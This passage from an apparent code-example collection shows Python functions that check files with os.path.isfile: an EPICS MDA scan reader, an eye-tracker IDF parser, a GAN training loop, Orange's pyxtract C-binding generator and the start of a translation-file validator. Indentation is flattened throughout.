dim[2].p[k].data[i].append(s.p[k].data)
for k in range(s.nd):
if j==0: dim[2].d[k].data.append([])
dim[2].d[k].data[i].append(s.d[k].data)
if ((rank > 3) and (maxdim > 3)):
# collect 4D data
for i in range(dim[0].curr_pt):
file.seek(dim[0].plower_scans[i])
s1 = readScan(file, max(0,verbose-1))
for j in range(s1.curr_pt):
file.seek(s1.plower_scans[j])
s2 = readScan(file, max(0,verbose-1))
for k in range(s2.curr_pt):
file.seek(s2.plower_scans[k])
if ((i == 0) and (j == 0) and (k == 0)):
dim.append(readScan(file, max(0,verbose-1)))
dim[3].dim = 4
for m in range(dim[3].np):
data = dim[3].p[m].data
dim[3].p[m].data = [[[]]]
dim[3].p[m].data[0][0].append(data)
for m in range(dim[3].nd):
data = dim[3].d[m].data
dim[3].d[m].data = [[[]]]
dim[3].d[m].data[0][0].append(data)
else:
s = readScan(file, max(0,verbose-1))
# append data arrays
if j==0 and k==0:
for m in range(dim[3].np):
dim[3].p[m].data.append([[]])
dim[3].p[m].data[i][0].append(s.p[m].data)
for m in range(dim[3].nd):
dim[3].d[m].data.append([[]])
dim[3].d[m].data[i][0].append(s.d[m].data)
else:
for m in range(dim[3].np):
if k==0: dim[3].p[m].data[i].append([])
dim[3].p[m].data[i][j].append(s.p[m].data)
for m in range(dim[3].nd):
if k==0: dim[3].d[m].data[i].append([])
dim[3].d[m].data[i][j].append(s.d[m].data)
# Collect scan-environment variables into a dictionary
dict = {}
dict['sampleEntry'] = ("description", "unit string", "value", "EPICS_type")
dict['filename'] = fname
dict['version'] = version
dict['scan_number'] = scan_number
dict['rank'] = rank
dict['dimensions'] = dimensions
dict['isRegular'] = isRegular
dict['ourKeys'] = ['sampleEntry', 'filename', 'version', 'scan_number', 'rank', 'dimensions', 'isRegular', 'ourKeys']
if pExtra:
file.seek(pExtra)
buf = file.read() # Read all scan-environment data
u = xdrlib.Unpacker(buf)
numExtra = u.unpack_int()
for i in range(numExtra):
name = ''
n = u.unpack_int() # length of name string
if n: name = u.unpack_string()
desc = ''
n = u.unpack_int() # length of desc string
if n: desc = u.unpack_string()
EPICS_type = u.unpack_int()
unit = ''
value = ''
count = 0
if EPICS_type != 0: # not DBR_STRING
count = u.unpack_int() #
n = u.unpack_int() # length of unit string
if n: unit = u.unpack_string()
if EPICS_type == 0: # DBR_STRING
n = u.unpack_int() # length of value string
if n: value = u.unpack_string()
elif EPICS_type == 32: # DBR_CTRL_CHAR
#value = u.unpack_fstring(count)
v = u.unpack_farray(count, u.unpack_int)
value = ""
for i in range(len(v)):
# treat the byte array as a null-terminated string
if v[i] == 0: break
value = value + chr(v[i])
elif EPICS_type == 29: # DBR_CTRL_SHORT
value = u.unpack_farray(count, u.unpack_int)
elif EPICS_type == 33: # DBR_CTRL_LONG
value = u.unpack_farray(count, u.unpack_int)
elif EPICS_type == 30: # DBR_CTRL_FLOAT
value = u.unpack_farray(count, u.unpack_float)
elif EPICS_type == 34: # DBR_CTRL_DOUBLE
value = u.unpack_farray(count, u.unpack_double)
dict[name] = (desc, unit, value, EPICS_type, count)
file.close()
dim.reverse()
dim.append(dict)
dim.reverse()
if verbose:
print("%s is a %d-D file; %d dimensions read in." % (fname, dim[0]['rank'], len(dim)-1))
print("dim[0] = dictionary of %d scan-environment PVs" % (len(dim[0])))
print(" usage: dim[0]['sampleEntry'] ->", dim[0]['sampleEntry'])
for i in range(1,len(dim)):
print("dim[%d] = %s" % (i, str(dim[i])))
print(" usage: dim[1].p[2].data -> 1D array of positioner 2 data")
print(" usage: dim[2].d[7].data -> 2D array of detector 7 data")
if help:
print(" ")
print(" each dimension (e.g., dim[1]) has the following fields: ")
print(" time - date & time at which scan was started: %s" % (dim[1].time))
print(" name - name of scan record that acquired this dimension: '%s'" % (dim[1].name))
print(" curr_pt - number of data points actually acquired: %d" % (dim[1].curr_pt))
print(" npts - number of data points requested: %d" % (dim[1].npts))
print(" nd - number of detectors for this scan dimension: %d" % (dim[1].nd))
print(" d[] - list of detector-data structures")
print(" np - number of positioners for this scan dimension: %d" % (dim[1].np))
print(" p[] - list of positioner-data structures")
print(" nt - number of detector triggers for this scan dimension: %d" % (dim[1].nt))
print(" t[] - list of trigger-info structures")
if help:
print(" ")
print(" each detector-data structure (e.g., dim[1].d[0]) has the following fields: ")
print(" desc - description of this detector")
print(" data - data list")
print(" unit - engineering units associated with this detector")
print(" fieldName - scan-record field (e.g., 'D01')")
if help:
print(" ")
print(" each positioner-data structure (e.g., dim[1].p[0]) has the following fields: ")
print(" desc - description of this positioner")
print(" data - data list")
print(" step_mode - scan mode (e.g., Linear, Table, On-The-Fly)")
print(" unit - engineering units associated with this positioner")
print(" fieldName - scan-record field (e.g., 'P1')")
print(" name - name of EPICS PV (e.g., 'xxx:m1.VAL')")
print(" readback_desc - description of this positioner")
print(" readback_unit - engineering units associated with this positioner")
print(" readback_name - name of EPICS PV (e.g., 'xxx:m1.VAL')")
return dim
0
Example 61
def read_idf(filename, start, stop=None, missing=0.0, debug=False):
"""Returns a list with dicts for every trial. A trial dict contains the
following keys:
x - numpy array of x positions
y - numpy array of y positions
size - numpy array of pupil size
time - numpy array of timestamps, t=0 at trialstart
trackertime- numpy array of timestamps, according to the tracker
events - dict with the following keys:
Sfix - list of lists, each containing [starttime]
Ssac - EMPTY! list of lists, each containing [starttime]
Sblk - list of lists, each containing [starttime]
Efix - list of lists, each containing [starttime, endtime, duration, endx, endy]
Esac - EMPTY! list of lists, each containing [starttime, endtime, duration, startx, starty, endx, endy]
Eblk - list of lists, each containing [starttime, endtime, duration]
msg - list of lists, each containing [time, message]
NOTE: timing is in EyeTribe time!
arguments
filename - path to the file that has to be read
start - trial start string
keyword arguments
stop - trial ending string (default = None)
missing - value to be used for missing data (default = 0.0)
debug - Boolean indicating if DEBUG mode should be on or off;
if DEBUG mode is on, information on what the script
currently is doing will be printed to the console
(default = False)
returns
data - a list with a dict for every trial (see above)
"""
# # # # #
# debug mode
if debug:
def message(msg):
print(msg)
else:
def message(msg):
pass
# # # # #
# file handling
# check if the file exists
if os.path.isfile(filename):
# open file
message("opening file '%s'" % filename)
f = open(filename, 'r')
# raise exception if the file does not exist
else:
raise Exception("Error in read_eyetribe: file '%s' does not exist" % filename)
# read file contents
message("reading file '%s'" % filename)
raw = f.readlines()
# close file
message("closing file '%s'" % filename)
f.close()
# # # # #
# parse lines
# variables
data = []
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
starttime = 0
started = False
trialend = False
filestarted = False
# loop through all lines
for i in range(len(raw)):
# string to list
line = raw[i].replace('\n','').replace('\r','').split('\t')
# check if the line starts with '##' (denoting header)
if '##' in line[0]:
# skip processing
continue
elif '##' not in line[0] and not filestarted:
# check the indexes for several key things we want to extract
# (we need to do this, because ASCII outputs of the IDF reader
# are different, based on whatever the user wanted to extract)
timei = line.index("Time")
typei = line.index("Type")
msgi = -1
xi = {'L':None, 'R':None}
yi = {'L':None, 'R':None}
sizei = {'L':None, 'R':None}
if "L POR X [px]" in line:
xi['L'] = line.index("L POR X [px]")
if "R POR X [px]" in line:
xi['R'] = line.index("R POR X [px]")
if "L POR Y [px]" in line:
yi['L'] = line.index("L POR Y [px]")
if "R POR Y [px]" in line:
yi['R'] = line.index("R POR Y [px]")
if "L Dia X [px]" in line:
sizei['L'] = line.index("L Dia X [px]")
if "R Dia X [px]" in line:
sizei['R'] = line.index("R Dia X [px]")
# set filestarted to True, so we don't attempt to extract
# this info on all consecutive lines
filestarted = True
# check if trial has already started
if started:
# only check for stop if there is one
if stop != None:
if (line[typei] == 'MSG' and stop in line[msgi]) or i == len(raw)-1:
started = False
trialend = True
# check for new start otherwise
else:
if start in line or i == len(raw)-1:
started = True
trialend = True
# # # # #
# trial ending
if trialend:
message("trialend %d; %d samples found" % (len(data),len(x)))
# trial dict
trial = {}
trial['x'] = numpy.array(x)
trial['y'] = numpy.array(y)
trial['size'] = numpy.array(size)
trial['time'] = numpy.array(time)
trial['trackertime'] = numpy.array(trackertime)
trial['events'] = copy.deepcopy(events)
# events
trial['events']['Sblk'], trial['events']['Eblk'] = blink_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
trial['events']['Sfix'], trial['events']['Efix'] = fixation_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
trial['events']['Ssac'], trial['events']['Esac'] = saccade_detection(trial['x'],trial['y'],trial['trackertime'],missing=missing)
# add trial to data
data.append(trial)
# reset stuff
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
trialend = False
# check if the current line contains start message
else:
if line[typei] == "MSG":
if start in line[msgi]:
message("trialstart %d" % len(data))
# set started to True
started = True
# find starting time
starttime = int(line[timei])
# # # # #
# parse line
if started:
# message lines will usually start with a timestamp, followed
# by 'MSG', the trial number and the actual message, e.g.:
# "7818328012 MSG 1 # Message: 3"
if line[typei] == "MSG":
t = int(line[timei]) # time
m = line[msgi] # message
events['msg'].append([t,m])
# regular lines will contain tab separated values, beginning with
# a timestamp, follwed by the values that were chosen to be
# extracted by the IDF converter
else:
# see if current line contains relevant data
try:
# extract data on POR and pupil size
for var in ['x', 'y', 'size']:
exec("vi = %si" % var)
exec("v = %s" % var)
# nothing
if vi['L'] == None and vi['R'] == None:
val = 'not in IDF'
# only left eye
elif vi['L'] != None and vi['R'] == None:
val = float(line[vi['L']])
# only right eye
elif vi['L'] == None and vi['R'] != None:
val = float(line[vi['R']])
# average the two eyes, but only if they both
# contain valid data
elif vi['L'] != None and vi['R'] != None:
if float(line[vi['L']]) == 0:
val = float(line[vi['R']])
elif float(line[vi['R']]) == 0:
val = float(line[vi['L']])
else:
val = (float(line[vi['L']]) + float(line[vi['R']])) / 2.0
v.append(val)
# extract time data
time.append(int(line[timei])-starttime)
trackertime.append(int(line[timei]))
except:
message("line '%s' could not be parsed" % line)
continue # skip this line
# # # # #
# return
return data
0
Example 62
Project: Neural-Photo-Editor Source File: train_IAN.py
def main(args):
# Load Config Module from source file
config_module = imp.load_source('config', args.config_path)
# Get configuration parameters
cfg = config_module.cfg
# Define name of npz file to which the model parameters will be saved
weights_fname = str(args.config_path)[:-3]+'.npz'
# Define the name of the jsonl file to which the training log will be saved
metrics_fname = weights_fname[:-4]+'METRICS.jsonl'
# Prepare logs
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s| %(message)s')
logging.info('Metrics will be saved to {}'.format(metrics_fname))
mlog = metrics_logging.MetricsLogger(metrics_fname, reinitialize=(not args.resume))
model = config_module.get_model(interp=False)
logging.info('Compiling theano functions...')
# Compile functions
tfuncs, tvars,model = make_training_functions(cfg,model)
# Shuffle Initial masks
model['l_IAF_mu'].shuffle("Once")
model['l_IAF_ls'].shuffle("Once")
logging.info('Training...')
# Iteration Counter, indicates total number of minibatches processed
itr = 0
# Best validation accuracy variable
best_acc = 0
# Test set for interpolations
test_set = CelebA('64',('test',),sources=('features',))
# Loop across epochs
offset = True
params = list(set(lasagne.layers.get_all_params(model['l_out'],trainable=True)+\
lasagne.layers.get_all_params(model['l_discrim'],trainable=True)+\
[x for x in lasagne.layers.get_all_params(model['l_out'])+\
lasagne.layers.get_all_params(model['l_discrim'])if x.name[-4:]=='mean' or x.name[-7:]=='inv_std']))
if os.path.isfile(weights_fname) and args.resume:
metadata = GANcheckpoints.load_weights(weights_fname, params)
min_epoch = metadata['epoch']+1 if 'epoch' in metadata else 0
new_lr = metadata['learning_rate'] if 'learning_rate' in metadata else cfg['lr_schedule'][0]
tvars['learning_rate'].set_value(np.float32(new_lr))
print('loading weights, epoch is '+str(min_epoch),'lr is '+str(new_lr)+'.')
else:
min_epoch = 0
# Ratio of gen updates to discrim updates
update_ratio = cfg['update_ratio']
n_shuffles = 0
for epoch in xrange(min_epoch,cfg['max_epochs']):
offset = not offset
# Get generator for data
loader = data_loader(cfg,
CelebA('64',('train',),sources=('features',)),
offset=offset*cfg['batch_size']//2,shuffle=cfg['shuffle'],
seed=epoch) # Does this need to happen every epoch?
# Update Learning Rate, either with annealing schedule or decay rate
if isinstance(cfg['learning_rate'], dict) and epoch > 0:
if any(x==epoch for x in cfg['learning_rate'].keys()):
lr = np.float32(tvars['learning_rate'].get_value())
new_lr = cfg['learning_rate'][epoch]
logging.info('Changing learning rate from {} to {}'.format(lr, new_lr))
tvars['learning_rate'].set_value(np.float32(new_lr))
if cfg['decay_rate'] and epoch > 0:
lr = np.float32(tvars['learning_rate'].get_value())
new_lr = lr*(1-cfg['decay_rate'])
logging.info('Changing learning rate from {} to {}'.format(lr, new_lr))
tvars['learning_rate'].set_value(np.float32(new_lr))
# Number of Chunks
iter_counter = 0
# Epoch-Wise Metrics
# vloss_e, floss_e, closs_e, a_g_loss_e, a_d_loss_e, d_kl_e, c_acc_e, acc_e = 0, 0, 0, 0, 0, 0, 0, 0
# Loop across all chunks
for x_shared in loader:
# Increment Chunk Counter
iter_counter+=1
# Figure out number of batches
num_batches = len(x_shared)//cfg['batch_size']
# Shuffle chunk
# np.random.seed(42*epoch)
index = np.random.permutation(len(x_shared))
# Load data onto GPU
tvars['X_shared'].set_value(x_shared[index], borrow=True)
tvars['Z_shared'].set_value(np.float32(np.random.randn(len(x_shared),cfg['num_latents'])),borrow=True)
# Ternary adversarial objectives
tvars['p1'].set_value(np.asarray([[1,0,0]]*len(x_shared),dtype=np.int32))
tvars['p2'].set_value(np.asarray([[0,1,0]]*len(x_shared),dtype=np.int32))
tvars['p3'].set_value(np.asarray([[0,0,1]]*len(x_shared),dtype=np.int32))
# Chunk Metrics
metrics = OrderedDict()
for gkey in tvars['gd']:
metrics[gkey] = []
for dkey in tvars['dd']:
metrics[dkey] = []
# Loop across all batches in chunk
for bi in xrange(num_batches):
# Train and record metrics
if itr % (update_ratio+1)==0:
gen_out = tfuncs['update_gen'](bi)
for key,entry in zip(tvars['gd'],gen_out):
metrics[key].append(entry)
else:
d_out = tfuncs['update_discrim'](bi)
for key,entry in zip(tvars['dd'],d_out):
metrics[key].append(entry)
itr += 1
for key in metrics:
metrics[key] = float(np.mean(metrics[key]))
# Chunk-wise metrics
if (iter_counter-1) % 50 ==0:
title = 'epoch itr '
form = []
for item in metrics:
title = title+' '+str(item)
form.append(len(str(item)))
logging.info(title)
log_output = '%4d '%epoch + '%6d '%itr
for f,item in zip(form,metrics):
e = '%'+str(f)+'.4f'
log_output = log_output+' '+e%metrics[item]
logging.info(log_output)
# logging.info('epoch: {:4d}, itr: {:8d}, ag_loss: {:7.4f}, adg_loss: {:7.4f}, add_loss: {:7.4f}, acc: {:5.3f}, ploss: {:7.4f}, pacc: {:5.3f}'.format(epoch,itr,agloss,adgloss,addloss,accuracy,ploss,pixel_accuracy))
mlog.log(epoch=epoch,itr=itr,metrics=metrics)
# Log Chunk Metrics
# If we see improvement, save weights and produce output images
# if cfg['reconstruct'] or cfg['introspect']:
if not (epoch%cfg['checkpoint_every_nth']):
# Open Test Set
test_set.open()
np.random.seed(epoch*42+5)
# Generate Random Samples, averaging latent vectors across masks
samples = np.uint8(from_tanh(tfuncs['sample'](np.random.randn(27,cfg['num_latents']).astype(np.float32))))
np.random.seed(epoch*42+5)
# Get Reconstruction/Interpolation Endpoints
endpoints = np.uint8(test_set.get_data(request = list(np.random.choice(test_set.num_examples,6,replace=False)))[0])
# Get reconstruction latents
Ze = np.asarray(tfuncs['Zfn'](to_tanh(np.float32(endpoints))))
# Get Interpolant Latents
Z = np.asarray([Ze[2 * i, :] * (1 - j) + Ze[2 * i + 1, :] * j for i in range(3) for j in [x/6.0 for x in range(7)]],dtype=np.float32)
# Get all images
images = np.append(samples,np.concatenate([np.insert(endpoints[2*i:2*(i+1),:,:,:],1,np.uint8(from_tanh(tfuncs['sample'](Z[7*i:7*(i+1),:]))),axis=0) for i in range(3)],axis=0),axis=0)
# Plot images
plot_image_grid(images,6,9,'pics/'+str(args.config_path)[:-3]+'_'+str(epoch)+'.png')
# Close test set
test_set.close(state=None)
# Save weights
params = list(set(lasagne.layers.get_all_params(model['l_out'],trainable=True)+\
lasagne.layers.get_all_params(model['l_discrim'],trainable=True)+\
[x for x in lasagne.layers.get_all_params(model['l_out'])+\
lasagne.layers.get_all_params(model['l_discrim'])if x.name[-4:]=='mean' or x.name[-7:]=='inv_std']))
GANcheckpoints.save_weights(weights_fname, params,{'epoch':epoch,'itr': itr, 'ts': time.time(),'learning_rate':np.float32(tvars['learning_rate'].get_value())})
logging.info('training done')
0
Example 63
Project: orange Source File: pyxtract.py
def writeAppendix(filename, targetname, classdefs, aliases):
if ( not recreate
and os.path.isfile(targetname)
and (os.path.getmtime(targetname)>=os.path.getmtime(filename))
and (os.path.getmtime(targetname)>=os.path.getmtime("aliases.txt"))):
printV1("\nFile unchanged, skipping.")
return
usedbases={}
classdefi=classdefs.items()
classdefi.sort(lambda x,y:cmp(x[0],y[0]))
basecount=0
for (type, fields) in classdefi:
if fields.infile==filename:
usedbases[fields.basetype]=1
basecount += 1
if usedbases.has_key("ROOT"):
del usedbases["ROOT"]
if not basecount:
if os.path.isfile(targetname):
os.remove(targetname)
printV1("\nFile does not define any classes, removing.")
else:
printV1("\nFile does not define any classes, skipping.")
return
printV1("\nConstructing class definitions")
outfile=open("px/"+targetname+".new", "wt")
newfiles.append(targetname)
outfile.write("/* This file was generated by pyxtract \n Do not edit.*/\n\n")
outfile.write('#include <cstddef>\n\n')
usedbases=usedbases.keys()
usedbases.sort()
#outfile.write("extern TOrangeType PyOrOrangeType_Type;\n")
for type in usedbases:
if type:
if classdefs[type].imported:
outfile.write("extern IMPORT_DLL TOrangeType PyOr"+type+"_Type;\n")
else:
outfile.write("extern %s_API TOrangeType PyOr%s_Type;\n" % (modulename.upper(), type))
outfile.write("\n\n")
for (type, fields) in classdefi:
if fields.infile!=filename:
continue
outfile.write('/* -------------- %s --------------*/\n\n' % type)
# Write PyMethodDef
if len(fields.methods):
methodnames=fields.methods.keys()
methodnames.sort()
outfile.write("PyMethodDef "+type+"_methods[] = {\n")
for methodname in methodnames:
method=fields.methods[methodname]
cname = method.cname[0] == "*" and method.cname[1:] or type+"_"+method.cname
if method.arguments:
outfile.write(' {"'+methodname+'", (binaryfunc)'+cname+", "+method.argkw+", \""+method.arguments+"\"},\n")
else:
outfile.write(' {"'+methodname+'", (binaryfunc)'+cname+", "+method.argkw+"},\n")
outfile.write(" {NULL, NULL}\n};\n\n")
# Write GetSetDef
properties=filter(lambda (name, definition): not definition.builtin, fields.properties.items())
if len(properties):
properties.sort(lambda x,y:cmp(x[0], y[0]))
outfile.write("PyGetSetDef "+type+"_getset[]= {\n")
for (name, definition) in properties:
camelname = camel2underscore(name)
outfile.write(' {"%s"' % camelname)
if definition.hasget:
outfile.write(", (getter)%s_get_%s" % (type, name))
else:
outfile.write(", NULL")
if definition.hasset:
outfile.write(", (setter)%s_set_%s" % (type, name))
else:
outfile.write(", NULL")
if definition.description:
outfile.write(', "'+definition.description+'"')
outfile.write("},\n")
outfile.write(' {NULL}};\n\n')
# Write doc strings
if fields.call and fields.call.arguments and len(fields.call.arguments):
outfile.write('char '+type+'[] = "'+fields.call.arguments+'";\n')
if fields.description:
outfile.write('char '+type+'_doc[] = "'+fields.description+'";\n')
outfile.write('\n')
if fields.subconstants:
for constname, constvalues in fields.subconstants.items():
outfile.write("""
TNamedConstantsDef %(wholename)s_values[] = {%(valueslist)s, {0, 0}};
static PyObject *%(wholename)s_repr(PyObject *self) { return stringFromList(self, %(wholename)s_values); }
PyObject *%(wholename)s__reduce__(PyObject *self);
PyMethodDef %(wholename)s_methods[] = { {"__reduce__", (binaryfunc)%(wholename)s__reduce__, METH_NOARGS, "reduce"}, {NULL, NULL}};
PyTypeObject Py%(wholename)s_Type = {PyObject_HEAD_INIT(&PyType_Type) 0, "%(classname)s.%(constname)s", sizeof(PyIntObject), 0, 0, 0, 0, 0, 0, (reprfunc)%(wholename)s_repr, 0, 0, 0, 0, 0, (reprfunc)%(wholename)s_repr, 0, 0, 0, Py_TPFLAGS_DEFAULT | Py_TPFLAGS_CHECKTYPES, 0, 0, 0, 0, 0, 0, 0, %(wholename)s_methods, 0, 0, &PyInt_Type, 0, 0, 0, 0, 0, 0, 0, PyObject_Del};
PyObject *Py%(wholename)s_FromLong(long ok) { PyIntObject *r = PyObject_New(PyIntObject, &Py%(wholename)s_Type); r->ob_ival = ok; return (PyObject *)r; }
void *PT%(wholename)s(void *l) { return Py%(wholename)s_FromLong(*(int *)l); }
PyObject *%(wholename)s__reduce__(PyObject *self) { return Py_BuildValue("O(s(i))", getExportedFunction("__pickleLoaderNamedConstants"), "%(wholename)s", ((PyIntObject *)(self))->ob_ival); }
""" % {"wholename": type+"_"+constname, "classname": type, "constname": constname, "valueslist": ", ".join('{"%s", %s}' % k for k in constvalues)})
#PyObject *%(wholename)s__reduce__(PyObject *self) { return Py_BuildValue("O(i)", &PyInt_Type, ((PyIntObject *)(self))->ob_ival); }
# Write constants
if fields.constants:
outfile.write("void %s_addConstants()\n{ PyObject *&dict = PyOr%s_Type.ot_inherited.tp_dict;\n if (!dict) dict = PyDict_New();\n" % (type, type))
for name, const in fields.constants.items():
if const.ccode:
outfile.write(' PyDict_SetItemString(dict, "%s", %s);\n' % (name, const.ccode))
else:
outfile.write(' PyDict_SetItemString(dict, "%s", %s());\n' % (name, const.cfunc))
outfile.write("}\n\n")
# Write default constructor
if fields.constructor:
if fields.constructor.type!="MANUAL":
outfile.write('POrange %s_default_constructor(PyTypeObject *type)\n{ return POrange(mlnew T%s(), type); }\n\n' % (type, type))
else:
outfile.write('PyObject *%s_abstract_constructor(PyTypeObject *type, PyObject *args, PyObject *kwds)\n{ return PyOrType_GenericAbstract((PyTypeObject *)&PyOr%s_Type, type, args, kwds); }\n\n' % (type, type))
# Write constructor keywords
if fields.constructor_keywords:
outfile.write('char *%s_constructor_keywords[] = {%s, NULL};\n' % (type, reduce(lambda x, y: x + ", " + y, ['"%s"' % x for x in fields.constructor_keywords])))
if fields.recognized_attributes:
outfile.write('char *%s_recognized_attributes[] = {%s, NULL};\n' % (type, reduce(lambda x, y: x + ", " + y, ['"%s"' % x for x in fields.recognized_attributes])))
outfile.write('\n')
# Write aliases
if aliases.has_key(type):
outfile.write("TAttributeAlias "+type+"_aliases[] = {\n")
for alias in aliases[type]:
outfile.write(' {"%s", "%s"},\n' % tuple(alias))
outfile.write(" {NULL, NULL}};\n\n")
# Write type object
def hasany(methods, fields):
for smethod in methods:
if smethod[0] and fields.specialmethods.has_key(smethod[0]):
return 1
return 0
def writeslots(methods, isbase=0):
def write0(innulls):
outfile.write(innulls and ' 0,' or ' 0,')
return 1
innulls=0
for smethod in methods:
if not smethod[0]:
if smethod[1]=="BASE":
if fields.basetype and (fields.basetype!="ROOT"):
name='(_typeobject *)&PyOr'+fields.basetype+'_Type,'
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* tp_base */\n' % name))
else:
innulls=write0(innulls)
elif smethod[1]=="DICTOFFSET":
if fields.dictfield and fields.dictfield!="0":
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* tp_dictoffset */\n' % ("offsetof(%s, %s)," % (fields.datastructure, fields.dictfield))))
else:
innulls=write0(innulls)
elif smethod[1]=="DOC":
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* tp_doc */\n' % ('"'+findConstructorDoc(classdefs, type)+'",')))
elif smethod[1]=="FLAGS":
fl = "Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_RICHCOMPARE"
for cond, flag in [(fields.specialmethods.has_key("traverse"), "Py_TPFLAGS_HAVE_GC")
]:
if cond:
fl += " | "+flag
innulls=outfile.write((innulls and '\n' or '') + (' %s, /* tp_flags */\n' % fl))
else:
otherfields= [("as_number", hasnumeric),
("as_sequence", hassequence),
("as_mapping", hasmapping),
("doc", fields.description),
("methods", fields.methods),
("getset", len(properties))
]
for (name, condition) in otherfields:
if smethod[1]==name:
if condition:
slotcont='%s_%s,' % (type, name)
if name[:3]=="as_":
slotcont="&"+slotcont
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* tp_%s */\n' % (slotcont, name)))
else:
innulls=write0(innulls)
break
else:
if len(smethod)==3:
if smethod[2]=='0':
innulls=write0(innulls)
else:
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* %s */\n' % (smethod[2]+',', smethod[1])))
else:
raise "invalid slot name %s" % smethod[1]
else: # smethod[0]!=""
if fields.specialmethods.has_key(smethod[0]):
innulls=outfile.write((innulls and '\n' or '') + (' %-50s /* %s */\n' % ("(%s)%s_%s," % (smethod[2], type, smethod[0]), smethod[1])))
elif smethod[0]=="new":
if fields.constructor:
innulls = outfile.write((innulls and '\n' or '') + (' %-50s /* tp_new */\n' % ("(newfunc)%s," % genericconstrs[fields.constructor.type])))
else:
innulls = outfile.write((innulls and '\n' or '') + (' %-50s /* tp_new */\n' % ("(newfunc)%s_abstract_constructor," % type)))
else:
innulls=write0(innulls)
return innulls
additional=[]
for (subtype, submethods, subappendix) in [('PyNumberMethods', specialnumericmethods, '_as_number'),
('PySequenceMethods', specialsequencemethods, '_as_sequence'),
('PyMappingMethods', specialmappingmethods, '_as_mapping')]:
hasit = hasany(submethods, fields)
additional.append(hasit)
if hasit:
outfile.write(subtype+' '+type+subappendix +' = {\n')
innulls=writeslots(submethods, 0)
outfile.write((innulls and '\n' or '') + '};\n\n')
hasnumeric, hassequence, hasmapping = tuple(additional)
outfile.write('PyTypeObject PyOr'+type+'_Type_inh = {\n')
outfile.write(' PyObject_HEAD_INIT((_typeobject *)&PyType_Type)\n')
outfile.write(' 0,\n')
displayname = getattr(fields, "displayname", "Orange.core."+type) # was: <modulename>.<type>
outfile.write(' "%s",\n' % displayname)
outfile.write(' sizeof(%s), 0,\n' % fields.datastructure)
innulls=writeslots(specialmethods, 1)
outfile.write((innulls and '\n' or '') + '};\n\n')
if fields.datastructure == "TPyOrange":
outfile.write(cc_functions % {"type": type})
outfile.write('%(modulename)s_API TOrangeType PyOr%(type)s_Type (PyOr%(type)s_Type_inh, typeid(T%(type)s)' % {"modulename": modulename.upper(), "type": type})
outfile.write(', ' + (fields.constructor and fields.constructor.type!="MANUAL" and type+'_default_constructor' or '0'))
if fields.datastructure == "TPyOrange":
outfile.write(', cc_%s, ccn_%s' % (type, type))
else:
outfile.write(', PyOr_noConversion, PyOr_noConversion')
outfile.write(', ' + (fields.constructor_keywords and type+'_constructor_keywords' or 'NULL'))
outfile.write(', ' + (fields.constructor and fields.constructor.allows_empty_args and 'true' or 'false'))
outfile.write(', ' + (fields.recognized_attributes and type+'_recognized_attributes' or 'NULL'))
outfile.write(', ' + (aliases.has_key(type) and type+'_aliases' or 'NULL'))
outfile.write(');\n\n\n\n')
if not (fields.abstract or fields.constructor and fields.constructor.allows_empty_args or fields.methods.has_key("__reduce__")):
printV0("Warning: class '%s' will not be picklable", type, False)
outfile.close()
0
Example 64
def validate_file(file_path, validation_mode, reference_pot=None):
'''
Given a pot or po file scan all it's entries looking for problems
with variable substitutions. See the following functions for
details on how the validation is performed.
* validate_substitutions_match()
* validate_substitution_syntax()
* validate_positional_substitutions()
Returns the number of entries with errors.
For po files, ``reference_pot`` gives a pot file to merge with (to recover
comments and file locations)
'''
def emit_messages():
if n_warnings:
warning_lines.insert(0, section_seperator)
warning_lines.insert(1, "%d validation warnings in %s" % (n_warnings, file_path))
print('\n'.join(warning_lines))
if n_errors:
error_lines.insert(0, section_seperator)
error_lines.insert(1, "%d validation errors in %s" % (n_errors, file_path))
print('\n'.join(error_lines))
Result = namedtuple('ValidateFileResult', ['n_entries', 'n_msgids', 'n_msgstrs', 'n_warnings', 'n_errors'])
warning_lines = []
error_lines = []
n_entries = 0
n_msgids = 0
n_msgstrs = 0
n_entries = 0
n_warnings = 0
n_errors = 0
n_plural_forms = 0
if not os.path.isfile(file_path):
error_lines.append(entry_seperator)
error_lines.append('file does not exist "%s"' % (file_path))
n_errors += 1
emit_messages()
return Result(n_entries=n_entries, n_msgids=n_msgids, n_msgstrs=n_msgstrs, n_warnings=n_warnings, n_errors=n_errors)
try:
po = polib.pofile(file_path)
except Exception as e:
error_lines.append(entry_seperator)
error_lines.append('Unable to parse file "%s": %s' % (file_path, e))
n_errors += 1
emit_messages()
return Result(n_entries=n_entries, n_msgids=n_msgids, n_msgstrs=n_msgstrs, n_warnings=n_warnings, n_errors=n_errors)
if validation_mode == 'po' and reference_pot:
# Merge the .pot file for comments and file locations
po.merge(reference_pot)
if validation_mode == 'po':
plural_forms = po.metadata.get('Plural-Forms')
if not plural_forms:
error_lines.append(entry_seperator)
error_lines.append("%s: does not have Plural-Forms header" % file_path)
n_errors += 1
match = re.search(r'\bnplurals\s*=\s*(\d+)', plural_forms)
if match:
n_plural_forms = int(match.group(1))
else:
error_lines.append(entry_seperator)
error_lines.append("%s: does not specify integer nplurals in Plural-Forms header" % file_path)
n_errors += 1
n_entries = len(po)
for entry in po:
entry_warnings = []
entry_errors = []
have_msgid = entry.msgid.strip() != ''
have_msgid_plural = entry.msgid_plural.strip() != ''
have_msgstr = entry.msgstr.strip() != ''
if have_msgid:
n_msgids += 1
if have_msgid_plural:
n_msgids += 1
if have_msgstr:
n_msgstrs += 1
if validation_mode == 'pot':
prog_langs = get_prog_langs(entry)
if have_msgid:
errors = validate_positional_substitutions(entry.msgid, prog_langs, 'msgid')
entry_errors.extend(errors)
if have_msgid_plural:
errors = validate_positional_substitutions(entry.msgid_plural, prog_langs, 'msgid_plural')
entry_errors.extend(errors)
elif validation_mode == 'po':
if have_msgid:
if have_msgstr:
